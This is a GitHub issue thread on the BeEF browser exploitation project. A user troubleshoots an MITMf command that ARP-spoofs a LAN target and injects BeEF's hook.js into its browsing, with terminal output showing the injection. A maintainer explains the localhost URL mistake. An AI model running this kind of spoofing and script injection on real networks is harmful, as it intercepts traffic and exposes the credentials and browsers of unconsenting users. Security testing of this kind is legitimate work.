### ISSUE TITLE
No Online IP Issue

### ISSUE THREAD

**Issue by m-imran79** [beefproject/beef#1505]
I do not see any ONLINE IP in the Beef Panel. I use the following MITMF command for injection.

root@kali:~/MITMf# python mitmf.py --arp --spoof --gateway 192.168.1.254 --target 192.168.1.69 -i wlan0 --inject --js-url http://127.0.0.1:3000/hook.js

The result I get in the Terminal is as follows, But when I sign in the Beef Panel, I do not see Online IP

███╗   ███╗██╗████████╗███╗   ███╗███████╗

████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝

██╔████╔██║██║   ██║   ██╔████╔██║█████╗  

██║╚██╔╝██║██║   ██║   ██║╚██╔╝██║██╔══╝  

██║ ╚═╝ ██║██║   ██║   ██║ ╚═╝ ██║██║     

╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝     

[*] MITMf v0.9.8 - 'The Dark Side'

|

|_ Net-Creds v1.0 online

|_ Inject v0.4

|_ Spoof v0.6

|  |_ ARP spoofing enabled

|_ Sergio-Proxy v0.2.1 online

|_ SSLstrip v0.9 by Moxie Marlinspike online

|

|_ MITMf-API online

|_ HTTP server online

 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)

|_ DNSChef v0.4 online

|_ SMB server online

2018-02-10 15:26:13 192.168.1.69 [type:Chrome-63 os:Windows] www.cnn.com

2018-02-10 15:26:16 192.168.1.69 [type:Chrome-63 os:Windows] [Inject] Injected JS script: www.cnn.com

**Comment by bcoles** [comment]
The command line you're using will only work if you're trying to MITM the host on which BeEF is running.

```bash
python mitmf.py --arp --spoof --gateway 192.168.1.254 --target 192.168.1.69 -i wlan0 --inject --js-url http://127.0.0.1:3000/hook.js
```

Try using the LAN IP address instead of `127.0.0.1`

**Comment by m-imran79** [comment]
Sorry for my dumness, I do not understand you hit. Do you mean, instead of using wlan0 , i should use eth0? I was experimenting on hooking any computer connected with same Wifi. When I use eth0, then this command works perfectly, but after trying to hook virtual machines, i was to hook any computer connected with same wifi, that is why i disconnect eth0 (NAT Network) and use only external Wifi Adapter. 

Thank you for helping

**Comment by m-imran79** [comment]
Plus I also saw on the internet, that some people are saying to update the beef version. How do I update the beef? I mean what is the command? 

apt-get update beef??

**Comment by bcoles** [comment]
`--js-url http://127.0.0.1:3000/hook.js` will inject a script URL of `http://127.0.0.1:3000/hook.js` which look something like `<script src="http://127.0.0.1:3000/hook.js"></script>`

127.0.0.1 is localhost. I BeEF is not running on local host then it the client cannot load the script.

**Comment by bcoles** [comment]
To update BeEF: `git pull`

**Comment by m-imran79** [comment]
Thank you for the reply. 

I am more confused. I run Beef first. Once it runs completely and I see the graphical interface of Beef, then I run the command and get following results in the terminal. Now the URL I enter in the command is finishing on 3000 but if you see at the bottom of the results, it says that the code is injected on 9000. Why is this? May this is the issue that I do not get Online Hooked IP. 

root@kali:~/MITMf# python mitmf.py --arp --spoof --gateway 192.168.1.254 --target 192.168.1.69 -i wlan0 --inject --js-url http://127.0.0.1:3000/hook.js

 ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓  █████▒
▓██▒▀█▀ ██▒▓██▒▓  ██▒ ▓▒▓██▒▀█▀ ██▒▓██   ▒ 
▓██    ▓██░▒██▒▒ ▓██░ ▒░▓██    ▓██░▒████ ░ 
▒██    ▒██ ░██░░ ▓██▓ ░ ▒██    ▒██ ░▓█▒  ░ 
▒██▒   ░██▒░██░  ▒██▒ ░ ▒██▒   ░██▒░▒█░    
░ ▒░   ░  ░░▓    ▒ ░░   ░ ▒░   ░  ░ ▒ ░    
░  ░      ░ ▒ ░    ░    ░  ░      ░ ░      
░      ░    ▒ ░  ░      ░      ░    ░ ░    
       ░    ░                  ░                                                     

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
Error starting HTTP server: [Errno 98] Address already in use
|_ HTTP server online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online

2018-02-11 09:42:46 192.168.1.69 [type:Chrome-63 os:Windows] www.awaztoday.pk
2018-02-11 09:42:49 192.168.1.69 [type:Chrome-63 os:Windows] [Inject] Injected JS script: www.cnn.com

**Comment by bcoles** [comment]
Try hooking a browser with BeEF without using mitmf to ensure BeEF is working.
